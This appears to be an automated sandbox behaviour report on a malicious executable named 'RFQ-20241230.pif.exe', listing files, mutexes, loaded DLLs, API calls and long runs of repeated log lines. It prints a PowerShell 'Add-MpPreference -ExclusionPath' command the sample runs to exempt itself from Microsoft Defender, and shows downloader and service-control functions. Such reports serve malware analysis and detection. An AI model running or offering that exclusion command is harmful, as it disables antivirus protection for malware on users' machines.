Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ-20241230.pif.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-4WOIVV
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upatqsuf.jwx.ps1
Source: RFQ-20241230.pif.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RFQ-20241230.pif.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RFQ-20241230.pif.exe ReversingLabs: Detection: 73%
Source: unknown Process created: C:\Users\user\Desktop\RFQ-20241230.pif.exe "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Process created: C:\Users\user\Desktop\RFQ-20241230.pif.exe "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Process created: C:\Users\user\Desktop\RFQ-20241230.pif.exe "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: RFQ-20241230.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RFQ-20241230.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0041BCF3
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00434006 push ecx; ret 5_2_00434019
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004567F0 push eax; ret 5_2_0045680E
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0045B9DD push esi; ret 5_2_0045B9E6
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00463EF3 push ds; retf 5_2_00463EEC
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00455EBF push ecx; ret 5_2_00455ED2
                Source: RFQ-20241230.pif.exeStatic PE information: section name: .text entropy: 7.855220500565996
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00406128 ShellExecuteW,URLDownloadToFileW,5_2_00406128
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_00419BD4

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 5_2_0041BCF3
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
